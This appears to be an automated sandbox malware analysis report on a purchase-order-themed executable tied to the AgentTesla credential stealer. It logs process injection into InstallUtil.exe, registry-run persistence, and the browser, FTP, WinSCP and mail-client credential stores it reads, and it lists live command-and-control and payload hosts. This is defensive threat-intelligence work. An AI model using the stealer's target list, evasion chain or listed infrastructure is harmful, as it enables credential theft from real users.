                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: DE1008
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 72C008
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1152008
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Queries volume information: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe VolumeInformation
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Queries volume information: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match; File source: dump.pcap, type: PCAP
                    Source: Yara match; File source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7548, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7888, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 8124, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Source: Yara match; File source: dump.pcap, type: PCAP
                    Source: Yara match; File source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.GEFA-Order 232343-68983689.exe.4495600.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7548, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7888, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 8124, type: MEMORYSTR

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 311 Security Software Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 12 Virtualization/Sandbox Evasion | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 211 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                    [Behavior graph] Behavior Graph ID: 1529729; Sample: GEFA-Order 232343-68983689.exe; Startdate: 09/10/2024; Architecture: WINDOWS; Score: 100

                    Source | Detection | Scanner | Label | Link
                    --- | --- | --- | --- | ---
                    GEFA-Order 232343-68983689.exe | 16% | ReversingLabs | |
                    GEFA-Order 232343-68983689.exe | 26% | Virustotal | | Browse
                    GEFA-Order 232343-68983689.exe | 100% | Avira | HEUR/AGEN.1308518 |
                    GEFA-Order 232343-68983689.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    --- | --- | --- | --- | ---
                    C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | 100% | Avira | HEUR/AGEN.1308518 |
                    C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | 16% | ReversingLabs | |
                    C:\Users\user\AppData\Roaming\Cbgoomiexw.exe | 26% | Virustotal | | Browse

                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    --- | --- | --- | --- | ---
                    ftp.alternatifplastik.com | 3% | Virustotal | | Browse
                    rubberpartsmanufacturers.com | 0% | Virustotal | | Browse

                    Source | Detection | Scanner | Label | Link
                    --- | --- | --- | --- | ---
                    https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe |
                    https://account.dyn.com/ | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                    https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe |
                    https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe |
                    https://rubberpartsmanufacturers.com/omani/Mrlres.mp3 | 0% | Virustotal | | Browse
                    https://github.com/mgravell/protobuf-neti | 0% | Virustotal | | Browse
                    http://ftp.alternatifplastik.com | 3% | Virustotal | | Browse
                    https://github.com/mgravell/protobuf-netJ | 0% | Virustotal | | Browse
                    https://rubberpartsmanufacturers.com | 0% | Virustotal | | Browse
                    https://github.com/mgravell/protobuf-net | 0% | Virustotal | | Browse

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| ftp.alternatifplastik.com | 5.2.84.236 | true | true | | unknown |
| rubberpartsmanufacturers.com | 103.191.208.122 | true | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://rubberpartsmanufacturers.com/omani/Mrlres.mp3 | false | | unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://github.com/mgravell/protobuf-net | GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp | false | | unknown |
| https://github.com/mgravell/protobuf-neti | GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp | false | | unknown |
| https://stackoverflow.com/q/14436606/23354 | GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://account.dyn.com/ | GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://github.com/mgravell/protobuf-netJ | GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp | false | | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.0000000003261000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.0000000002651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://rubberpartsmanufacturers.com | GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| https://stackoverflow.com/q/11564914/23354; | GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://stackoverflow.com/q/2152978/23354 | GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://ftp.alternatifplastik.com | InstallUtil.exe, 00000001.00000002.1884023773.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1966127439.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2913625192.000000000331C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 5.2.84.236 | ftp.alternatifplastik.com | Turkey | | 3188 | ALASTYRTR | true |
| 103.191.208.122 | rubberpartsmanufacturers.com | unknown | | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | false |
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1529729
                    Start date and time:2024-10-09 10:50:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:GEFA-Order 232343-68983689.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 528
                    • Number of non-executed functions: 23
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 09:51:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cbgoomiexw C:\Users\user\AppData\Roaming\Cbgoomiexw.exe |
| 09:51:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cbgoomiexw C:\Users\user\AppData\Roaming\Cbgoomiexw.exe |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 5.2.84.236 | Kuwait Offer48783929281-BZ2.exe | Get hash | malicious | AgentTesla | Browse | |
| | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | Get hash | malicious | AgentTesla | Browse | |
| | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | Get hash | malicious | AgentTesla | Browse | |
| | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | Get hash | malicious | AgentTesla | Browse | |
| | PO_9876563647-FLOWTRONIX (FT)UUE.exe | Get hash | malicious | AgentTesla | Browse | |
| | Richardson Electronics, LTD. PRD10221301UUE.exe | Get hash | malicious | AgentTesla | Browse | |
| | PURCHASE ORDER ADDISON-6378397379UUE.exe | Get hash | malicious | AgentTesla | Browse | |
| | Teklif-6205018797-6100052155-UUE.exe | Get hash | malicious | AgentTesla | Browse | |
| | Offer-CNVN-82927-VIETNAM.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| | OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe | Get hash | malicious | AgentTesla | Browse | |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| ftp.alternatifplastik.com | Kuwait Offer48783929281-BZ2.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | PO_9876563647-FLOWTRONIX (FT)UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | Richardson Electronics, LTD. PRD10221301UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | PURCHASE ORDER ADDISON-6378397379UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | Teklif-6205018797-6100052155-UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | Offer-CNVN-82927-VIETNAM.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 5.2.84.236 |
| | OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| ALASTYRTR | Kuwait Offer48783929281-BZ2.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
| | PO_9876563647-FLOWTRONIX (FT)UUE.exe | Get hash | malicious | AgentTesla | Browse | 5.2.84.236 |
